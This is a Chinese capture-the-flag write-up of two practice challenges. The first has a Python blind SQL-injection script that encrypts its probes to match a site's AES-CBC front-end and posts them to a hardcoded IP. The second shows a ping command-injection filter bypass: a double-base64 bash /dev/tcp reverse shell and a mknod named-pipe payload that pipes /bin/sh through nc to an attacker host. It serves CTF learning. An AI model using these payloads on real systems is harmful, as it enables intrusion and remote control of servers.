练习题wp


前言

师傅出题,干!

js_encode_with_sql_injection

image.png

很清晰:前端对 username、password 做 AES-CBC 加密,AES key 再用 RSA 加密后一起发到后端;这个 key 是随机生成的 16 位字符串。题目名已经点明要 SQL 注入,思路也就很清晰了:自己把 key 固定死,用同样的 CBC 方式加密注入语句发过去。于是开始了踩坑之旅。坑在于:用 Python 和 PHP 复现 CBC 加密,结果和 JS 加密出来的不一样。对比下面两段脚本和最终可用的 getmiwen() 可以看到原因之一:PHP/Python 脚本用的是 PKCS#7 填充(补 chr($pad)),而前端(以及后来匹配上的在线工具)用的是零字节填充('\0');key、IV 相同的情况下,填充方式不同密文最后一块就不同。另外如果 JS 端把 key 以字符串而非 WordArray 传给 CryptoJS,CryptoJS 会把它当口令走一遍密钥派生(输出带 "Salted__" 前缀),这也是常见的不一致来源,可一并排查。下面给出 Python 和 PHP 的 CBC 加密脚本,有空可以复现这个坑。

<?php

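class MagicCrypt {
    // Fixed IV. A constant IV together with a constant key makes equal plaintexts
    // produce equal ciphertexts -- acceptable only for reproducing the challenge's
    // front-end, never for protecting real data.
    private $iv = "1234567890123456";

    // 16-byte key => AES-128 (MCRYPT_RIJNDAEL_128 with a 128-bit key).
    private $encryptKey = "Ca94HUh2kEA2Vwz7";

    /**
     * AES-128-CBC encrypt with PKCS#7 padding, returned as base64.
     *
     * Padding is always 1..16 bytes (a full block when the input is aligned),
     * each byte holding the pad length. This is NOT the zero-byte padding the
     * challenge front-end used, so ciphertexts differ from the site's.
     *
     * NOTE: the mcrypt extension was deprecated in PHP 7.1 and removed in 7.2;
     * openssl_encrypt('aes-128-cbc', OPENSSL_RAW_DATA) is the drop-in replacement.
     *
     * @param string $encryptStr plaintext (binary-safe)
     * @return string base64-encoded ciphertext
     */
    public function encrypt($encryptStr) {
        $module = $this->openModule();

        // PKCS#7 padding
        $block = mcrypt_get_block_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC);
        $pad = $block - (strlen($encryptStr) % $block);
        $encryptStr .= str_repeat(chr($pad), $pad);

        $encrypted = mcrypt_generic($module, $encryptStr);

        $this->closeModule($module);

        return base64_encode($encrypted);
    }

    /**
     * Decrypt base64 ciphertext produced by encrypt() and strip the PKCS#7 padding.
     *
     * The original returned the padded plaintext verbatim; now the padding is
     * removed and validated.
     *
     * @param string $encryptStr base64 ciphertext
     * @return string|false plaintext, or false when the input is not valid
     *         base64, not block-aligned, or carries malformed padding
     */
    public function decrypt($encryptStr) {
        $encryptedData = base64_decode($encryptStr, true);
        if ($encryptedData === false || strlen($encryptedData) % 16 !== 0) {
            return false;
        }

        $module = $this->openModule();
        $plain = mdecrypt_generic($module, $encryptedData);
        $this->closeModule($module);

        return $this->unpad($plain);
    }

    /**
     * Open and initialise the AES-128-CBC module with the fixed key and IV.
     *
     * The 2nd and 4th arguments of mcrypt_module_open() are library
     * *directories*, not the IV; the original passed the IV there (ignored in
     * practice, but wrong). The IV belongs to mcrypt_generic_init().
     */
    private function openModule() {
        $module = mcrypt_module_open(MCRYPT_RIJNDAEL_128, '', MCRYPT_MODE_CBC, '');
        mcrypt_generic_init($module, $this->encryptKey, $this->iv);
        return $module;
    }

    // Release the module resources opened by openModule().
    private function closeModule($module) {
        mcrypt_generic_deinit($module);
        mcrypt_module_close($module);
    }

    /**
     * Remove PKCS#7 padding, rejecting anything that is not a valid pad.
     *
     * @return string|false
     */
    private function unpad($data) {
        $len = strlen($data);
        if ($len === 0) {
            return false;
        }
        $pad = ord($data[$len - 1]);
        if ($pad < 1 || $pad > 16 || $pad > $len) {
            return false;
        }
        if (substr($data, -$pad) !== str_repeat(chr($pad), $pad)) {
            return false;
        }
        return substr($data, 0, $len - $pad);
    }
}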
// Demo: round-trip a short string and print both the ciphertext and the recovered plaintext.
$encryptString = 'asdasd';
$crypt = new MagicCrypt();

$result = $crypt->encrypt($encryptString);          // ciphertext (base64)
$decryptString = $crypt->decrypt($result);          // recovered plaintext

echo $result . "<br/>";
echo $decryptString . "<br/>";
?>
import base64
from Crypto.Cipher import AES

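class AESCipher:
    """AES-128-CBC with PKCS#7 padding and an all-zero IV (pycrypto/pycryptodome, Python 3).

    This is NOT what the challenge front-end produced: the working exploit
    further down (getmiwen) pads with NUL bytes instead, which is the
    mismatch the write-up describes.
    """

    BLOCK_SIZE = 16  # AES block size in bytes (same value as AES.block_size)

    def __init__(self, key):
        # Only the first 16 bytes are used -> AES-128. A shorter key is NOT
        # stretched; AES.new() rejects it at encrypt/decrypt time.
        if isinstance(key, str):
            key = key.encode("utf-8")
        self.key = key[:16]
        # Fixed all-zero IV: identical plaintexts give identical ciphertexts.
        # Tolerable only because reproducible output is needed for the challenge.
        self.iv = b"\0" * 16

    def __pad(self, data: bytes) -> bytes:
        """PKCS#7: append n bytes of value n, 1 <= n <= 16 (a full block when aligned)."""
        # `block - (len % block)` is already in 1..16, so the original's
        # "if amount_to_pad == 0" branch was unreachable and is dropped.
        n = self.BLOCK_SIZE - (len(data) % self.BLOCK_SIZE)
        return data + bytes([n]) * n

    def __unpad(self, data: bytes) -> bytes:
        """Strip PKCS#7 padding, raising ValueError instead of returning garbage.

        The original trusted the last byte blindly (`text[:-pad]`), which on a
        corrupted or wrongly-keyed ciphertext silently returns wrong data.
        """
        if not data or len(data) % self.BLOCK_SIZE:
            raise ValueError("ciphertext length is not a multiple of the block size")
        n = data[-1]
        if not 1 <= n <= self.BLOCK_SIZE or data[-n:] != bytes([n]) * n:
            raise ValueError("invalid PKCS#7 padding")
        return data[:-n]

    def encrypt(self, raw) -> bytes:
        """Encrypt `raw` (str or bytes) and return base64 as bytes."""
        if isinstance(raw, str):
            raw = raw.encode("utf-8")
        cipher = AES.new(self.key, AES.MODE_CBC, self.iv)
        return base64.b64encode(cipher.encrypt(self.__pad(raw)))

    def decrypt(self, enc) -> str:
        """Decrypt base64 input produced by encrypt() and return the UTF-8 plaintext."""
        data = base64.b64decode(enc)
        cipher = AES.new(self.key, AES.MODE_CBC, self.iv)
        return self.__unpad(cipher.decrypt(data)).decode("utf-8")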


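if __name__ == '__main__':
    # The original used `//` for these comments, which is a SyntaxError in Python.
    # The key must be exactly 16 bytes (AES-128); shorter keys are rejected by AES.new().
    e = AESCipher('xxxxxxxxxxxxxxxx')   # encryption key (placeholder)
    secret_data = "xxxxxxxx "           # data to encrypt (placeholder)
    enc_str = e.encrypt(secret_data)
    print('enc_str: ' + enc_str.decode())
    dec_str = e.decrypt(enc_str)
    print('dec str: ' + dec_str)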

最后发现某在线加密工具的结果和 JS 的一样(注意它用的是零字节填充,而不是上面脚本的 PKCS#7),于是用 Python 按同样方式加密注入语句发到后端即可。上脚本:

#!/usr/bin/python
# -*- coding:utf-8-*-
import base64
import requests
import re
from Crypto.Cipher import AES

list = "1234567890"  # per-position alphabet used by main(); NOTE: shadows the builtin `list`, and covers only 0-9 although HEX() also emits A-F
chars = 'abcdefghijklmnopqrstuvwxyz_0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ=+-*/{\}?!:@#$%&()[],.'  # broader charset; not referenced by the functions below
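def zero_pad(data, block_size=16):
    """Pad with NUL bytes up to a multiple of `block_size` (no-op when already aligned).

    This mirrors the front-end's zero padding -- NOT PKCS#7 -- which is why the
    PHP/Python scripts above produced ciphertext different from the site's.
    str input is UTF-8 encoded first; returns bytes.
    """
    if isinstance(data, str):
        data = data.encode("utf-8")
    rem = len(data) % block_size
    if rem:
        data += b"\0" * (block_size - rem)
    return data


def getmiwen(mingwen):
    """Encrypt `mingwen` the way the challenge front-end does and return base64 (str).

    AES-128-CBC with a fixed IV and key and zero padding. The key/IV are
    presumably the ones whose RSA-wrapped form is sent as `code` in zhuru();
    change one and the other must change with it.

    Python 3 / pycryptodome: keys, IV and plaintext are bytes. The original
    `.encode('base64')` (Python 2 only) appended a newline, which zhuru()
    strips; base64.b64encode emits none, so the request is unchanged.
    """
    iv = b'1234567890123456'
    key = b'2rT3TgEUapzyPQRv'
    aes = AES.new(key, AES.MODE_CBC, iv)
    return base64.b64encode(aes.encrypt(zero_pad(mingwen))).decode("ascii")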

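def zhuru(username):
    """POST one login attempt with an already-encrypted `username` and return the response body.

    `password` is a fixed ciphertext and `code` is (presumably) the fixed
    RSA-wrapped AES key the server decrypts; both must stay paired with the
    key/IV used in getmiwen().
    """
    url = "http://129.204.73.141:2000/login.php"
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0'
    }
    data = {
        # strip the trailing '\n' the old Python 2 base64 codec appended
        'username': username.strip('\n'),
        'password': "JfSE3en4ZlF3Q9T1aXSJKg==",
        'code': "1277a7060a98f9ac132b5974cdd5c4d494f304022b654ec90bf4d1c8fdbe23e96bba5cf33f2a116677d379f038a5dcb6114eb4ffb4db58d84bb57e6ad5f848074e4f00114f8d9ac5250572cbac1fa3b7d2db372a4a0f057c09adeb4b19089dbe29f73313c53e6a39f4fd0d845dd270069da874c1b6a43222667b961b8f098a5b",
    }
    # Without a timeout requests blocks forever on a stalled server and the
    # oracle loop in main() hangs silently.
    r = requests.post(url, headers=headers, data=data, timeout=10)
    return r.text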
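def guanjianzi():
    """Fuzz SQL keywords: encrypt each wordlist line, send it, print the ones answered with "wrong".

    The original called `zhuru(miwen, miwen)` -- two arguments to a one-argument
    function -- so it raised TypeError on the first line. The file is now
    closed via `with`. Raw-string path: `\\C` and `\\s` are not escapes, so the
    value is unchanged, only the invalid-escape warning goes away.
    """
    with open(r"D:\CTF\字典\sql关键字fuzz.txt") as file:
        for line in file:
            miwen = getmiwen(line)
            ttext = zhuru(miwen)
            if "wrong" in ttext:
                print(line)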
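def main():
    """Recover HEX(password) one hex digit at a time through a boolean oracle.

    Each probe `1'=(hex(password)regexp'^PREFIX')='1` is true iff HEX(password)
    starts with PREFIX; the write-up treats a "wrong user" response as the hit.
    HEX() emits 0-9A-F, so the alphabet includes A-F (the module-level `list`
    had only digits and stalled on any byte whose hex contains a letter; MySQL
    REGEXP is case-insensitive on non-binary strings, so case does not matter).
    Stops as soon as no digit extends the prefix instead of looping 64 times.
    """
    alphabet = "0123456789ABCDEF"
    passwd = ''
    for _ in range(64):  # at most 64 hex chars = 32 bytes
        for ch in alphabet:
            sqlline = "1'=(hex(password)regexp'^%s')='1" % (passwd + ch)
            if "wrong user" in zhuru(getmiwen(sqlline)):
                passwd += ch
                print(passwd)
                break
        else:
            # No digit matched: either fully recovered or the oracle stopped working.
            break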


if __name__ == '__main__':
    # Only the hex extraction runs; guanjianzi() (keyword fuzzing) is not invoked here.
    main()

也可以选择了直接console跑
image.png
image.png
image.png

ping_to_rce

image.png

题目就一个输入框,扫目录什么的都扫不出东西,那就对着这里干。很明显是 ping,那肯定就是命令注入了。不管输入什么,返回只有 success、error、hacher 三种,经过 fuzz 发现过滤了很多常见关键词。
image.png
命令注入没有回显,想要拿到数据,就得想办法把数据带出来(外带或反弹 shell)。
先了解命令注入常用技巧:
命令注入骚操作

image.png

image.png


安排!
反弹shell: https://www.cnblogs.com/r00tgrok/p/reverse_shell_cheatsheet.html
https://www.freebuf.com/articles/system/178150.html
https://xz.aliyun.com/t/2549
https://www.anquanke.com/post/id/87017
hhh,里面讲的关键词全被过滤了。折腾了很久,msf 生成的 python 反弹 shell 也试了,本地能打通,远程打不了,晕死。最后想到往 /tmp 写一个 sh 脚本再执行。
踩坑:怎么写?

echo "WW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4eE1qQXVOemt1TXpFdU1UZzFMelEwTXlBd1BpWXhDZz09Cg=="|base64 -d|base64 -d >3.sh

这里可以探讨一下为什么要二次编码:解一层得到 "YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjAuNzkuMzEuMTg1LzQ0MyAwPiYxCg==",其中含有 "+" 这类很可能被过滤的字符;再编一层后,外层字符串恰好不含 "+"、"/",只剩字母数字和结尾的 "=",更容易通过过滤。最终解出来的是 bash -i >& /dev/tcp/IP/443 0>&1。
踩坑:写了就可以执行了?
image.png
卡在这里,我都快放弃了,想想没可能啊,我权限啥的都改好了,不知道为啥就是执行不了,快要放弃之时,搜了一下执行sh脚本方法
https://blog.csdn.net/ljp812184246/article/details/52585650

image.png
踩坑:这样还是不行?怎么解?考虑用 bash 运行试试?bash 又被过滤了,凉了?
参考我最先贴的"命令注入骚操作"那篇文章,其实在踩坑的时候就已经有绕过 bash 的办法了。
image.png

最后上aye的payload

ip=|mknod%09/tmp/backpipe66%09p
ip=|/bin/sh%09</tmp/backpipe66%09|nc%09x.x.x.x.x%092333>/tmp/backpipe66
直接用 sh 代替 bash。解释一下这两条 payload:%09 是制表符,用来代替被过滤的空格;mknod ... p 创建一个命名管道;第二条让 /bin/sh 从管道读命令、把输出通过 nc 发给攻击机,nc 收到的攻击机输入再写回管道,这就是不依赖 nc -e 的经典反弹 shell(注意 x.x.x.x.x 是攻击机 IP 占位,多写了一段)。

image.png
安排!

署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。